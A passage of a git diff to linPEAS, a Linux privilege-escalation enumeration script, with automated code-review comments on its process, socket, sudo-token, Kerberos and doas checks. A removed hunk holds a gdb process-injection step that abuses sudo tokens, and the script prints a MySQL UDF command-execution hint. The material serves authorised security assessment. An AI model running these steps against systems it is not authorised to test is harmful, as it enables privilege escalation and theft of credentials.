@@ -6,13 +6,18 @@ if ! [ "$SEARCH_IN_FOLDER" ]; then #-- PCS) Cleaned proccesses print_2title "Cleaned processes" + if [ "$NOUSEPS" ]; then printf ${BLUE}"[i]$GREEN Looks like ps is not finding processes, going to read from /proc/ and not going to monitor 1min of processes\n"$NC fi print_info "Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes" + if [ -f "/etc/fstab" ] && cat /etc/fstab | grep -q "hidepid=2"; then + echo "Looks like /etc/fstab has hidepid=2, so ps will not show processes of other users" + fi + if [ "$NOUSEPS" ]; then - print_ps | sed -${E} "s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," | sed -${E} "s,$processesVB,${SED_RED_YELLOW},g" | sed "s,$processesB,${SED_RED}," | sed -${E} "s,$processesDump,${SED_RED}," + print_ps | grep -v 'sed-Es' | sed -${E} "s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," | sed -${E} "s,$processesVB,${SED_RED_YELLOW},g" | sed "s,$processesB,${SED_RED}," | sed -${E} "s,$processesDump,${SED_RED}," pslist=$(print_ps) else (ps fauxwww || ps auxwww | sort ) 2>/dev/null | grep -v "\[" | grep -v "%CPU" | while read psline; do 
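Review bot: The new hidepid probe only consults `/etc/fstab`, but `/proc` is commonly remounted with `hidepid` by a unit file or an admin command with no fstab entry, and kernels since 5.8 also accept the named form `hidepid=invisible`, so the warning would be missed on exactly the hardened hosts it is meant for. Reading the live mount table covers both cases and drops the `cat`: `if grep -qsE "hidepid=(2|invisible)" /etc/fstab /proc/mounts; then`, where `-s` silences the missing-file error so the `[ -f "/etc/fstab" ]` test is no longer needed.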
@@ -42,6 +47,33 @@ if ! [ "$SEARCH_IN_FOLDER" ]; then echo "" fi +CURRENT_USER_PIVOT_PID="" +if ! [ "$SEARCH_IN_FOLDER" ] && ! [ "$NOUSEPS" ]; then + #-- PCS) Process opened by other users + print_2title "Processes whose PPID belongs to a different user (not root)" + print_info "You will know if a user can somehow spawn processes as a different user" + + # Function to get user by PID + get_user_by_pid() { + ps -p "$1" -o user | grep -v "USER" + } + + # Find processes with PPID and user info, then filter those where PPID's user is different from the process's user + ps -eo pid,ppid,user | grep -v "PPID" | while read -r pid ppid user; do + if [ "$ppid" = "0" ]; then + continue + fi + ppid_user=$(get_user_by_pid "$ppid") + if echo "$user" | grep -Eqv "$ppid_user|root$"; then + echo "Proc $pid with ppid $ppid is run by user $user but the ppid user is $ppid_user" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED}," + if [ "$ppid_user" = "$USER" ]; then + CURRENT_USER_PIVOT_PID="$ppid" + fi + fi + done + echo "" +fi + if ! [ "$SEARCH_IN_FOLDER" ]; then #-- PCS) Files opened by processes belonging to other users if ! [ "$IAMROOT" ]; then 
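Review bot: The new PPID loop calls `get_user_by_pid`, i.e. a fresh `ps -p "$ppid" -o user`, for every line of `ps -eo pid,ppid,user`, which on a busy host is hundreds of extra ps forks during a scan that already takes minutes; the listing already contains each pid's user, so capture it once (`pslist=$(ps -eo pid,ppid,user)`) and resolve the parent with `echo "$pslist" | awk -v p="$ppid" '$1 == p {print $3}'`. When the parent has exited between the two calls, `ppid_user` is empty and `grep -Eqv "$ppid_user|root$"` becomes `grep -Eqv "|root$"`, whose empty alternative matches every line, so the entry is silently skipped — acceptable, but it deserves a comment because it looks accidental. The hunk also nests a function definition inside an `if` body, which the rest of this file does not do; hoisting `get_user_by_pid` next to the other helpers would match the file's style.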
@@ -71,7 +103,13 @@ if ! [ "$SEARCH_IN_FOLDER" ]; then print_2title "Different processes executed during 1 min (interesting is low number of repetitions)" print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#frequent-cron-jobs" temp_file=$(mktemp) - if [ "$(ps -e -o command 2>/dev/null)" ]; then for i in $(seq 1 1250); do ps -e -o command >> "$temp_file" 2>/dev/null; sleep 0.05; done; sort "$temp_file" 2>/dev/null | uniq -c | grep -v "\[" | sed '/^.\{200\}./d' | sort -r -n | grep -E -v "\s*[1-9][0-9][0-9][0-9]"; rm "$temp_file"; fi + if [ "$(ps -e -o user,command 2>/dev/null)" ]; then + for i in $(seq 1 1210); do + ps -e -o user,command >> "$temp_file" 2>/dev/null; sleep 0.05; + done; + sort "$temp_file" 2>/dev/null | uniq -c | grep -v "\[" | sed '/^.\{200\}./d' | sort -r -n | grep -E -v "\s*[1-9][0-9][0-9][0-9]" | sed -${E} "s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED},"; + rm "$temp_file"; + fi echo "" fi fi @@ -109,7 +147,7 @@ if ! [ "$SEARCH_IN_FOLDER" ]; then program="" program=$(defaults read "$f" Program 2>/dev/null) if ! [ "$program" ]; then - program=$(defaults read /Library/LaunchDaemons/MonitorHelper.plist ProgramArguments | grep -Ev "^\(|^\)" | cut -d '"' -f 2) + program=$(defaults read "$f" ProgramArguments | grep -Ev "^\(|^\)" | cut -d '"' -f 2) fi if [ -w "$program" ]; then echo "$program" is writable | sed -${E} "s,.*,${SED_RED_YELLOW},"; 
@@ -173,12 +211,12 @@ printf "%s\n" "$PSTORAGE_SYSTEMD" | while read s; do fi done relpath1=$(grep -E '^Exec.*=(?:[^/]|-[^/]|\+[^/]|![^/]|!![^/]|)[^/@\+!-].*' "$s" 2>/dev/null | grep -Iv "=/") - relpath2=$(grep -E '^Exec.*=.*/bin/[a-zA-Z0-9_]*sh ' "$s" 2>/dev/null | grep -Ev "/[a-zA-Z0-9_]+/") + relpath2=$(grep -E '^Exec.*=.*/bin/[a-zA-Z0-9_]*sh ' "$s" 2>/dev/null) if [ "$relpath1" ] || [ "$relpath2" ]; then if [ "$WRITABLESYSTEMDPATH" ]; then - echo "$s is executing some relative path" | sed -${E} "s,.*,${SED_RED},"; + echo "$s could be executing some relative path" | sed -${E} "s,.*,${SED_RED},"; else - echo "$s is executing some relative path" + echo "$s could be executing some relative path" fi fi fi @@ -249,6 +287,7 @@ if ! [ "$IAMROOT" ]; then if ! [ "$unix_scks_list" ];then unix_scks_list=$(netstat -a -p --unix 2>/dev/null | grep -Ei "listen|PID" | grep -Eo "/[a-zA-Z0-9\._/\-]+" | tail -n +2) fi + unix_scks_list3=$(lsof -U 2>/dev/null | awk '{print $9}' | grep "/") fi if ! [ "$SEARCH_IN_FOLDER" ]; then @@ -259,7 +298,7 @@ if ! [ "$IAMROOT" ]; then fi # Detele repeated dockets and check permissions - (printf "%s\n" "$unix_scks_list" && printf "%s\n" "$unix_scks_list2") | sort | uniq | while read l; do + (printf "%s\n" "$unix_scks_list" && printf "%s\n" "$unix_scks_list2" && printf "%s\n" "$unix_scks_list3") | sort | uniq | while read l; do perms="" if [ -r "$l" ]; then perms="Read " diff --git a/linPEAS/builder/linpeas_parts/5_network_information.sh b/linPEAS/builder/linpeas_parts/5_network_information.sh index 402b579..d385ed0 100644 --- a/linPEAS/builder/linpeas_parts/5_network_information.sh +++ b/linPEAS/builder/linpeas_parts/5_network_information.sh @@ -24,7 +24,7 @@ fi #-- NI) Interfaces print_2title "Interfaces" cat /etc/networks 2>/dev/null -(ifconfig || ip a) 2>/dev/null +(ifconfig || ip a || (cat /proc/net/dev; cat /proc/net/fib_trie; cat /proc/net/fib_trie6)) 2>/dev/null echo "" #-- NI) Neighbours 
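Review bot: Dropping the `grep -Ev "/[a-zA-Z0-9_]+/"` filter makes `relpath2` match every unit whose `Exec*=` line runs `/bin/*sh `, whether or not the shell command contains a relative path, so the (now hedged) "could be executing some relative path" message fires for a large share of units and the reader gets no hint which line matched. Printing the matching line alongside keeps the broader match useful: `echo "$s could be executing some relative path: $relpath1$relpath2"`. The `while read s` loop that encloses this code starts before the hunk.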
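Review bot: The new interface fallback reads `/proc/net/fib_trie6`, which as far as I know does not exist (`fib_trie` is the IPv4 routing trie; IPv6 routes are exposed as `/proc/net/ipv6_route`), and the `2>/dev/null` hides the error, so the IPv6 part of the fallback silently prints nothing. Consider `cat /proc/net/ipv6_route` instead, and add a short comment such as `# no ifconfig/ip: dump interface counters and the routing tries from /proc` since `fib_trie` output looks nothing like an interface listing.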
@@ -54,7 +54,7 @@ fi #-- NI) Ports print_2title "Active Ports" print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports" -( (netstat -punta || ss -nltpu || netstat -anv) | grep -i listen) 2>/dev/null | sed -${E} "s,127.0.[0-9]+.[0-9]+|:::|::1:|0\.0\.0\.0,${SED_RED}," +( (netstat -punta || ss -nltpu || netstat -anv) | grep -i listen) 2>/dev/null | sed -${E} "s,127.0.[0-9]+.[0-9]+|:::|::1:|0\.0\.0\.0,${SED_RED},g" echo "" #-- NI) MacOS hardware ports diff --git a/linPEAS/builder/linpeas_parts/6_users_information.sh b/linPEAS/builder/linpeas_parts/6_users_information.sh index ed7127f..5fedb16 100644 --- a/linPEAS/builder/linpeas_parts/6_users_information.sh +++ b/linPEAS/builder/linpeas_parts/6_users_information.sh 
@@ -80,32 +80,34 @@ echo "" print_2title "Checking sudo tokens" print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#reusing-sudo-tokens" ptrace_scope="$(cat /proc/sys/kernel/yama/ptrace_scope 2>/dev/null)" -if [ "$ptrace_scope" ] && [ "$ptrace_scope" -eq 0 ]; then echo "ptrace protection is disabled (0)" | sed "s,is disabled,${SED_RED},g"; -else echo "ptrace protection is enabled ($ptrace_scope)" | sed "s,is enabled,${SED_GREEN},g"; -fi -is_gdb="$(command -v gdb 2>/dev/null)" -if [ "$is_gdb" ]; then echo "gdb was found in PATH" | sed -${E} "s,.*,${SED_RED},g"; -else echo "gdb wasn't found in PATH, this might still be vulnerable but linpeas won't be able to check it" | sed "s,gdb,${SED_GREEN},g"; -fi -if [ ! "$SUPERFAST" ] && [ "$ptrace_scope" ] && [ "$ptrace_scope" -eq 0 ] && [ "$is_gdb" ]; then - echo "Checking for sudo tokens in other shells owned by current user" - for pid in $(pgrep '^(ash|ksh|csh|dash|bash|zsh|tcsh|sh)$' -u "$(id -u)" 2>/dev/null | grep -v "^$$\$"); do - echo "Injecting process $pid -> "$(cat "/proc/$pid/comm" 2>/dev/null) - echo 'call system("echo | sudo -S touch /tmp/shrndom32r2r >/dev/null 2>&1 && echo | sudo -S chmod 777 /tmp/shrndom32r2r >/dev/null 2>&1")' | gdb -q -n -p "$pid" >/dev/null 2>&1 - if [ -f "/tmp/shrndom32r2r" ]; then - echo "Sudo token reuse exploit worked with pid:$pid! (see link)" | sed -${E} "s,.*,${SED_RED_YELLOW},"; - break - fi - done - if [ -f "/tmp/shrndom32r2r" ]; then - rm -f /tmp/shrndom32r2r 2>/dev/null - else echo "The escalation didn't work... 
(try again later?)" +if [ "$ptrace_scope" ] && [ "$ptrace_scope" -eq 0 ]; then + echo "ptrace protection is disabled (0), so sudo tokens could be abused" | sed "s,is disabled,${SED_RED},g"; + + if [ "$(command -v gdb 2>/dev/null)" ]; then + echo "gdb was found in PATH" | sed -${E} "s,.*,${SED_RED},g"; fi + + if [ "$CURRENT_USER_PIVOT_PID" ]; then + echo "The current user proc $CURRENT_USER_PIVOT_PID is the parent of a different user proccess" | sed -${E} "s,.*,${SED_RED},g"; + fi + + if [ -f "$HOME/.sudo_as_admin_successful" ]; then + echo "Current user has .sudo_as_admin_successful file, so he can execute with sudo" | sed -${E} "s,.*,${SED_RED},"; + fi + + if ps -eo pid,command -u "$(id -u)" | grep -v "$PPID" | grep -qE '(ash|ksh|csh|dash|bash|zsh|tcsh|sh)$'; then + echo "Current user has other interactive shells running" | sed -${E} "s,.*,${SED_RED},g"; + ps -eo pid,command -u "$(id -u)" | grep -v "$PPID" | grep -E '(ash|ksh|csh|dash|bash|zsh|tcsh|sh)$' + fi + +else + echo "ptrace protection is enabled ($ptrace_scope)" | sed "s,is enabled,${SED_GREEN},g"; + fi echo "" #-- UI) Doas -if [ "$(command -v doas 2>/dev/null)" ] || [ "$DEBUG" ]; then +if [ -f "/etc/doas.conf" ] || [ "$DEBUG" ]; then print_2title "Checking doas.conf" doas_dir_name=$(dirname "$(command -v doas)" 2>/dev/null) if [ "$(cat /etc/doas.conf $doas_dir_name/doas.conf $doas_dir_name/../etc/doas.conf $doas_dir_name/etc/doas.conf 2>/dev/null)" ]; then diff --git a/linPEAS/builder/linpeas_parts/7_software_information.sh b/linPEAS/builder/linpeas_parts/7_software_information.sh index 6a1c712..7e04b15 100644 --- a/linPEAS/builder/linpeas_parts/7_software_information.sh +++ b/linPEAS/builder/linpeas_parts/7_software_information.sh 
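Review bot: `grep -v "$PPID"` filters by substring, so with a parent pid of 123 any line whose pid or command text contains `123` (pid 1234, a port number in a command line) is dropped too; anchoring on the pid column avoids that: `grep -Ev "^ *$PPID "`. The `ps -eo pid,command -u "$(id -u)" | grep -v "$PPID" | grep -E '…'` pipeline is also run twice, once with `-q` for the test and once to print, so the two snapshots can disagree; running it once into a variable and testing `[ "$shells" ]` removes the second fork. Replacing the previous gdb injection into other users' shells with a pure report of the preconditions is a sound change, and the new `.sudo_as_admin_successful` check is a reasonable indicator.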
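Review bot: The doas guard now requires `/etc/doas.conf` to exist, but the body still reads `$doas_dir_name/doas.conf`, `$doas_dir_name/../etc/doas.conf` and `$doas_dir_name/etc/doas.conf`, so a doas installed under a prefix — the case those extra paths exist for — is no longer checked at all. Keeping both conditions covers it: `if [ -f "/etc/doas.conf" ] || [ "$(command -v doas 2>/dev/null)" ] || [ "$DEBUG" ]; then`.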
@@ -129,9 +129,9 @@ if [ "$PSTORAGE_MYSQL" ] || [ "$DEBUG" ]; then done fi - mysqlexec=$(whereis lib_mysqludf_sys.so 2>/dev/null | grep "lib_mysqludf_sys\.so") + mysqlexec=$(whereis lib_mysqludf_sys.so 2>/dev/null | grep -Ev '^lib_mysqludf_sys.so:$' | grep "lib_mysqludf_sys\.so") if [ "$mysqlexec" ]; then - echo "Found $mysqlexec" + echo "Found $mysqlexec. $(whereis lib_mysqludf_sys.so)" echo "If you can login in MySQL you can execute commands doing: SELECT sys_eval('id');" | sed -${E} "s,.*,${SED_RED}," fi done @@ -325,16 +325,20 @@ peass{NFS Exports} #-- SI) Kerberos kadmin_exists="$(command -v kadmin)" klist_exists="$(command -v klist)" -if [ "$kadmin_exists" ] || [ "$klist_exists" ] || [ "$PSTORAGE_KERBEROS" ] || [ "$DEBUG" ]; then +kinit_exists="$(command -v kinit)" +if [ "$kadmin_exists" ] || [ "$klist_exists" ] || [ "$kinit_exists" ] || [ "$PSTORAGE_KERBEROS" ] || [ "$DEBUG" ]; then print_2title "Searching kerberos conf files and tickets" print_info "http://book.hacktricks.xyz/linux-hardening/privilege-escalation/linux-active-directory" if [ "$kadmin_exists" ]; then echo "kadmin was found on $kadmin_exists" | sed "s,$kadmin_exists,${SED_RED},"; fi + if [ "$kinit_exists" ]; then echo "kadmin was found on $kinit_exists" | sed "s,$kinit_exists,${SED_RED},"; fi if [ "$klist_exists" ] && [ -x "$klist_exists" ]; then echo "klist execution"; klist; fi ptrace_scope="$(cat /proc/sys/kernel/yama/ptrace_scope 2>/dev/null)" if [ "$ptrace_scope" ] && [ "$ptrace_scope" -eq 0 ]; then echo "ptrace protection is disabled (0), you might find tickets inside processes memory" | sed "s,is disabled,${SED_RED},g"; else echo "ptrace protection is enabled ($ptrace_scope), you need to disable it to search for tickets inside processes memory" | sed "s,is enabled,${SED_GREEN},g"; fi + + (env || printenv) 2>/dev/null | grep -E "^KRB5" | sed -${E} "s,KRB5,${SED_RED},g" printf "%s\n" "$PSTORAGE_KERBEROS" | while read f; do if [ -r "$f" ]; then 
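Review bot: The changed echo prints the same text twice, because `$mysqlexec` already holds the surviving `whereis` line and `$(whereis lib_mysqludf_sys.so)` re-runs the command to append it; `echo "Found $mysqlexec"` is sufficient, or keep the `whereis` call only if the unfiltered output is wanted. The new filter `grep -Ev '^lib_mysqludf_sys.so:$'` leaves the dot unescaped while the following grep escapes it as `lib_mysqludf_sys\.so`; `grep -Fvx 'lib_mysqludf_sys.so:'` states the intent (drop the empty-result line) without regex. The enclosing `for`/`done` loop starts outside the hunk.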
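Review bot: The added kinit line reports the wrong binary: it echoes `kadmin was found on $kinit_exists`, a copy of the kadmin message, so the output attributes the kinit path to kadmin. It should read `if [ "$kinit_exists" ]; then echo "kinit was found on $kinit_exists" | sed "s,$kinit_exists,${SED_RED},"; fi`. The `(env || printenv) ... | grep -E "^KRB5"` line will also print the value of any `KRB5CCNAME`/`KRB5_CONFIG` style variable verbatim, which is the intended finding but worth a comment such as `# KRB5* vars reveal ticket cache and config locations` so the purpose is clear. The enclosing `if` block continues past the hunk.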
@@ -376,6 +380,8 @@ if [ "$kadmin_exists" ] || [ "$klist_exists" ] || [ "$PSTORAGE_KERBEROS" ] || [ fi +peass{FreeIPA} + peass{Knockd} peass{Kibana} @@ -505,7 +511,7 @@ SPLUNK_BIN="$(command -v splunk 2>/dev/null)" if [ "$PSTORAGE_SPLUNK" ] || [ "$SPLUNK_BIN" ] || [ "$DEBUG" ]; then print_2title "Searching uncommon passwd files (splunk)" if [ "$SPLUNK_BIN" ]; then echo "splunk binary was found installed on $SPLUNK_BIN" | sed "s,.*,${SED_RED},"; fi - printf "%s\n" "$PSTORAGE_SPLUNK" | sort | uniq | while read f; do + printf "%s\n" "$PSTORAGE_SPLUNK" | grep -v ".htpasswd" | sort | uniq | while read f; do if [ -f "$f" ] && ! [ -x "$f" ]; then echo "passwd file: $f" | sed "s,$f,${SED_RED}," cat "$f" 2>/dev/null | grep "'pass'|'password'|'user'|'database'|'host'|\$" | sed -${E} "s,password|pass|user|database|host|\$,${SED_RED}," diff --git a/linPEAS/builder/linpeas_parts/8_interesting_files.sh b/linPEAS/builder/linpeas_parts/8_interesting_files.sh deleted file mode 100644 index d3c932e..0000000 --- a/linPEAS/builder/linpeas_parts/8_interesting_files.sh +++ /dev/null 
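Review bot: In the splunk hunk, `grep -v ".htpasswd"` uses an unescaped dot in a basic regex, so it drops any path containing "htpasswd" preceded by any character (e.g. `xhtpasswd`) rather than only `.htpasswd` files; `grep -vF ".htpasswd"` (fixed string) or `grep -v "\.htpasswd"` expresses the exclusion exactly. The surrounding `while read f` loop and its `if [ "$PSTORAGE_SPLUNK" ]` guard extend beyond the hunk.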
@@ -1,723 +0,0 @@ -########################################### -#----------) Interesting files (----------# -########################################### - -check_critial_root_path(){ - folder_path="$1" - if [ -w "$folder_path" ]; then echo "You have write privileges over $folder_path" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if [ "$(find $folder_path -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find $folder_path -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if [ "$(find $folder_path -type f -not -user root 2>/dev/null)" ]; then echo "The following files aren't owned by root: $(find $folder_path -type f -not -user root 2>/dev/null)"; fi -} - - - - -##-- IF) SUID -print_2title "SUID - Check easy privesc, exploits and write perms" -print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid" -if ! [ "$STRINGS" ]; then - echo_not_found "strings" -fi -if ! [ "$STRACE" ]; then - echo_not_found "strace" -fi -suids_files=$(find $ROOT_FOLDER -perm -4000 -type f ! -path "/dev/*" 2>/dev/null) -for s in $suids_files; do - s=$(ls -lahtr "$s") - #If starts like "total 332K" then no SUID bin was found and xargs just executed "ls" in the current folder - if echo "$s" | grep -qE "^total"; then break; fi - - sname="$(echo $s | awk '{print $9}')" - if [ "$sname" = "." ] || [ "$sname" = ".." ]; then - true #Don't do nothing - elif ! [ "$IAMROOT" ] && [ -O "$sname" ]; then - echo "You own the SUID file: $sname" | sed -${E} "s,.*,${SED_RED}," - elif ! 
[ "$IAMROOT" ] && [ -w "$sname" ]; then #If write permision, win found (no check exploits) - echo "You can write SUID file: $sname" | sed -${E} "s,.*,${SED_RED_YELLOW}," - else - c="a" - for b in $sidB; do - if echo $s | grep -q $(echo $b | cut -d % -f 1); then - echo "$s" | sed -${E} "s,$(echo $b | cut -d % -f 1),${C}[1;31m& ---> $(echo $b | cut -d % -f 2)${C}[0m," - c="" - break; - fi - done; - if [ "$c" ]; then - if echo "$s" | grep -qE "$sidG1" || echo "$s" | grep -qE "$sidG2" || echo "$s" | grep -qE "$sidG3" || echo "$s" | grep -qE "$sidG4" || echo "$s" | grep -qE "$sidVB" || echo "$s" | grep -qE "$sidVB2"; then - echo "$s" | sed -${E} "s,$sidG1,${SED_GREEN}," | sed -${E} "s,$sidG2,${SED_GREEN}," | sed -${E} "s,$sidG3,${SED_GREEN}," | sed -${E} "s,$sidG4,${SED_GREEN}," | sed -${E} "s,$sidVB,${SED_RED_YELLOW}," | sed -${E} "s,$sidVB2,${SED_RED_YELLOW}," - else - echo "$s (Unknown SUID binary!)" | sed -${E} "s,/.*,${SED_RED}," - printf $ITALIC - if ! [ "$FAST" ] && [ "$STRINGS" ]; then - $STRINGS "$sname" 2>/dev/null | sort | uniq | while read sline; do - sline_first="$(echo "$sline" | cut -d ' ' -f1)" - if echo "$sline_first" | grep -qEv "$cfuncs"; then - if echo "$sline_first" | grep -q "/" && [ -f "$sline_first" ]; then #If a path - if [ -O "$sline_first" ] || [ -w "$sline_first" ]; then #And modifiable - printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is using $RED$sline_first$NC$ITALIC and you can modify it (strings line: $sline) (https://tinyurl.com/suidpath)\n" - fi - else #If not a path - if [ ${#sline_first} -gt 2 ] && command -v "$sline_first" 2>/dev/null | grep -q '/' && echo "$sline_first" | grep -Eqv "\.\."; then #Check if existing binary - printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is executing $RED$sline_first$NC$ITALIC and you can impersonate it (strings line: $sline) (https://tinyurl.com/suidpath)\n" - fi - fi - fi - done - if ! [ "$FAST" ] && [ "$TIMEOUT" ] && [ "$STRACE" ] && ! 
[ "$NOTEXPORT" ] && [ -x "$sname" ]; then - printf $ITALIC - echo "----------------------------------------------------------------------------------------" - echo " --- Trying to execute $sname with strace in order to look for hijackable libraries..." - OLD_LD_LIBRARY_PATH=$LD_LIBRARY_PATH - export LD_LIBRARY_PATH="" - timeout 2 "$STRACE" "$sname" 2>&1 | grep -i -E "open|access|no such file" | sed -${E} "s,open|access|No such file,${SED_RED}$ITALIC,g" - printf $NC - export LD_LIBRARY_PATH=$OLD_LD_LIBRARY_PATH - echo "----------------------------------------------------------------------------------------" - echo "" - fi - fi - fi - fi - fi -done; -echo "" - - -##-- IF) SGID -print_2title "SGID" -print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid" -sgids_files=$(find $ROOT_FOLDER -perm -2000 -type f ! -path "/dev/*" 2>/dev/null) -for s in $sgids_files; do - s=$(ls -lahtr "$s") - #If starts like "total 332K" then no SUID bin was found and xargs just executed "ls" in the current folder - if echo "$s" | grep -qE "^total";then break; fi - - sname="$(echo $s | awk '{print $9}')" - if [ "$sname" = "." ] || [ "$sname" = ".." ]; then - true #Don't do nothing - elif ! [ "$IAMROOT" ] && [ -O "$sname" ]; then - echo "You own the SGID file: $sname" | sed -${E} "s,.*,${SED_RED}," - elif ! 
[ "$IAMROOT" ] && [ -w "$sname" ]; then #If write permision, win found (no check exploits) - echo "You can write SGID file: $sname" | sed -${E} "s,.*,${SED_RED_YELLOW}," - else - c="a" - for b in $sidB; do - if echo "$s" | grep -q $(echo $b | cut -d % -f 1); then - echo "$s" | sed -${E} "s,$(echo $b | cut -d % -f 1),${C}[1;31m& ---> $(echo $b | cut -d % -f 2)${C}[0m," - c="" - break; - fi - done; - if [ "$c" ]; then - if echo "$s" | grep -qE "$sidG1" || echo "$s" | grep -qE "$sidG2" || echo "$s" | grep -qE "$sidG3" || echo "$s" | grep -qE "$sidG4" || echo "$s" | grep -qE "$sidVB" || echo "$s" | grep -qE "$sidVB2"; then - echo "$s" | sed -${E} "s,$sidG1,${SED_GREEN}," | sed -${E} "s,$sidG2,${SED_GREEN}," | sed -${E} "s,$sidG3,${SED_GREEN}," | sed -${E} "s,$sidG4,${SED_GREEN}," | sed -${E} "s,$sidVB,${SED_RED_YELLOW}," | sed -${E} "s,$sidVB2,${SED_RED_YELLOW}," - else - echo "$s (Unknown SGID binary)" | sed -${E} "s,/.*,${SED_RED}," - printf $ITALIC - if ! [ "$FAST" ] && [ "$STRINGS" ]; then - $STRINGS "$sname" | sort | uniq | while read sline; do - sline_first="$(echo $sline | cut -d ' ' -f1)" - if echo "$sline_first" | grep -qEv "$cfuncs"; then - if echo "$sline_first" | grep -q "/" && [ -f "$sline_first" ]; then #If a path - if [ -O "$sline_first" ] || [ -w "$sline_first" ]; then #And modifiable - printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is using $RED$sline_first$NC$ITALIC and you can modify it (strings line: $sline)\n" - fi - else #If not a path - if [ ${#sline_first} -gt 2 ] && command -v "$sline_first" 2>/dev/null | grep -q '/'; then #Check if existing binary - printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is executing $RED$sline_first$NC$ITALIC and you can impersonate it (strings line: $sline)\n" - fi - fi - fi - done - if ! [ "$FAST" ] && [ "$TIMEOUT" ] && [ "$STRACE" ] && [ ! "$SUPERFAST" ]; then - printf "$ITALIC" - echo " --- Trying to execute $sname with strace in order to look for hijackable libraries..." 
- timeout 2 "$STRACE" "$sname" 2>&1 | grep -i -E "open|access|no such file" | sed -${E} "s,open|access|No such file,${SED_RED}$ITALIC,g" - printf "$NC" - echo "" - fi - fi - fi - fi - fi -done; -echo "" - -##-- IF) Misconfigured ld.so -if ! [ "$SEARCH_IN_FOLDER" ] && ! [ "$IAMROOT" ]; then - print_2title "Checking misconfigurations of ld.so" - print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#ld-so" - printf $ITALIC"/etc/ld.so.conf\n"$NC; - cat /etc/ld.so.conf 2>/dev/null | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" - cat /etc/ld.so.conf 2>/dev/null | while read l; do - if echo "$l" | grep -q include; then - ini_path=$(echo "$l" | cut -d " " -f 2) - fpath=$(dirname "$ini_path") - if [ "$(find $fpath -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find $fpath -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - printf $ITALIC"$fpath\n"$NC | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" - for f in $fpath/*; do - printf $ITALIC" $f\n"$NC | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" - cat "$f" | grep -v "^#" | sed -${E} "s,$ldsoconfdG,${SED_GREEN}," | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" - done - fi - done - echo "" -fi - -##-- IF) Capabilities -if ! 
[ "$SEARCH_IN_FOLDER" ]; then - print_2title "Capabilities" - print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#capabilities" - if [ "$(command -v capsh)" ]; then - echo "Current env capabilities:" - (capsh --print 2>/dev/null | grep "Current:" | sed -${E} "s,$capsB,${SED_RED_YELLOW}," ) || echo_not_found "capsh" - echo "Current proc capabilities:" - (cat "/proc/$$/status" | grep Cap | sed -${E} "s,.*0000000000000000|CapBnd: 0000003fffffffff,${SED_GREEN},") 2>/dev/null || echo_not_found "/proc/$$/status" - echo "" - echo "Parent Shell capabilities:" - (capsh --decode=0x"$(cat /proc/$PPID/status 2>/dev/null | grep CapEff | awk '{print $2}')" 2>/dev/null) || echo_not_found "capsh" - else - echo "Current capabilities:" - cat /proc/self/status | grep Cap | sed -${E} "s, .*,${SED_RED},g" | sed -${E} "s,0000000000000000|0000003fffffffff,${SED_GREEN},g" - echo "" - echo "Shell capabilities:" - cat /proc/$PPID/status | grep Cap | sed -${E} "s, .*,${SED_RED},g" | sed -${E} "s,0000000000000000|0000003fffffffff,${SED_GREEN},g" - fi - echo "" - echo "Files with capabilities (limited to 50):" - getcap -r / 2>/dev/null | head -n 50 | while read cb; do - capsVB_vuln="" - - for capVB in $capsVB; do - capname="$(echo $capVB | cut -d ':' -f 1)" - capbins="$(echo $capVB | cut -d ':' -f 2)" - if [ "$(echo $cb | grep -Ei $capname)" ] && [ "$(echo $cb | grep -E $capbins)" ]; then - echo "$cb" | sed -${E} "s,.*,${SED_RED_YELLOW}," - capsVB_vuln="1" - break - fi - done - - if ! [ "$capsVB_vuln" ]; then - echo "$cb" | sed -${E} "s,$capsB,${SED_RED}," - fi - - if ! 
